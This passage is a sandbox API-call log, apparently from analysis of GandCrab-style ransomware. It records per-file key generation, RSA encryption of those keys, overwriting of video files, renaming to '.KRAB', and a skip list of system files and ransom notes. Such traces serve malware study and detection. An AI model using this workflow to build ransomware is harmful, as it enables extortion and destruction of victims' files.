0x77990000 [0099.339] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.339] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.339] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0099.339] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.340] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0099.340] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.340] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.340] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.340] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.340] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.340] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.341] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010f08) returned 1 [0099.341] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.341] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.341] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.341] GetLastError () returned 0x0 [0099.341] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.341] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0099.341] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0099.342] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.342] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.342] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.342] GetLastError () returned 0x0 [0099.342] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.342] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.342] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\0gjvnpw0a1ty.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.343] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.343] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.343] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x2152, lpOverlapped=0x0) returned 1 [0099.364] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffdeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.364] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2152, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x2152, lpOverlapped=0x0) returned 1 [0099.365] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.365] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.369] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.370] CloseHandle (hObject=0x3a8) returned 1 [0099.370] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.370] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\0gjvnpw0a1ty.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\0gjvnpw0a1ty.swf.krab")) returned 1 [0099.372] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.373] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.373] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.373] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock" [0099.373] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.374] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 76 [0099.375] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock") returned 71 [0099.375] lstrlenW (lpString=".lock") returned 5 [0099.375] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.375] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.375] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.375] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.375] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.375] lstrcmpW (lpString1="FtOY.avi", lpString2=".") returned 1 [0099.376] lstrcmpW (lpString1="FtOY.avi", lpString2="..") returned 1 [0099.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="FtOY.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi" [0099.376] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.376] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi.KRAB") returned 61 [0099.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi") returned 56 [0099.376] lstrlenW (lpString=".avi") returned 4 [0099.376] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.401] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0099.401] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi") returned 56 [0099.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi") returned 56 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="desktop.ini") returned 1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="autorun.inf") returned 1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="ntuser.dat") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="iconcache.db") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="bootsect.bak") returned 1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="boot.ini") returned 1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="ntuser.dat.log") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="thumbs.db") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="ntldr") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="NTDETECT.COM") returned -1 [0099.402] lstrcmpiW (lpString1="FtOY.avi", lpString2="Bootfont.bin") returned 1 [0099.402] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.403] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0099.403] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.404] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.404] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.404] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.404] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.404] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.404] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0099.405] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.405] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.405] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.405] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.405] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.405] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.406] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011458) returned 1 [0099.406] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.406] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.406] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.407] GetLastError () returned 0x0 [0099.407] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.407] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0099.407] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10111b0) returned 1 [0099.407] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.407] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.407] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.408] GetLastError () returned 0x0 [0099.408] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.408] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0099.408] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\ftoy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.408] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.409] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.409] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xe9a5, lpOverlapped=0x0) returned 1 [0099.429] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff165b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.429] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xe9a5, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xe9a5, lpOverlapped=0x0) returned 1 [0099.429] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.429] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.433] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.434] CloseHandle (hObject=0x3a8) returned 1 [0099.434] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.434] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\ftoy.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\FtOY.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\ftoy.avi.krab")) returned 1 [0099.435] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.436] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.436] lstrcmpW (lpString1="JOKLlidRP.flv", lpString2=".") returned 1 [0099.436] lstrcmpW (lpString1="JOKLlidRP.flv", lpString2="..") returned 1 [0099.436] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="JOKLlidRP.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv" [0099.436] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.436] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv.KRAB") returned 66 [0099.436] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv") returned 61 [0099.436] lstrlenW (lpString=".flv") returned 4 [0099.436] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.437] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0099.437] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv") returned 61 [0099.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv") returned 61 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="desktop.ini") returned 1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="autorun.inf") returned 1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="ntuser.dat") returned -1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="iconcache.db") returned 1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="bootsect.bak") returned 1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="boot.ini") returned 1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="ntuser.dat.log") returned -1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="thumbs.db") returned -1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0099.437] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.438] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="ntldr") returned -1 [0099.438] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="NTDETECT.COM") returned -1 [0099.438] lstrcmpiW (lpString1="JOKLlidRP.flv", lpString2="Bootfont.bin") returned 1 [0099.438] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.438] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0099.438] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.439] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.439] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.439] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0099.439] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.439] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.439] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0099.440] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.440] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.440] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.440] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0099.440] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.440] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.441] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0099.441] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.441] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.441] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.442] GetLastError () returned 0x0 [0099.442] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.442] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.442] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0099.442] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0099.442] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0099.442] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0099.443] GetLastError () returned 0x0 [0099.443] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.443] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.443] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\jokllidrp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.443] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.444] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.444] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x15290, lpOverlapped=0x0) returned 1 [0099.460] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffead70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.460] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15290, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x15290, lpOverlapped=0x0) returned 1 [0099.461] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0099.461] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.468] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.469] CloseHandle (hObject=0x3a8) returned 1 [0099.469] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.469] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\jokllidrp.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\JOKLlidRP.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\jokllidrp.flv.krab")) returned 1 [0099.470] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.470] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.470] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.470] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.470] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\KRAB-DECRYPT.txt" [0099.470] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.471] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: 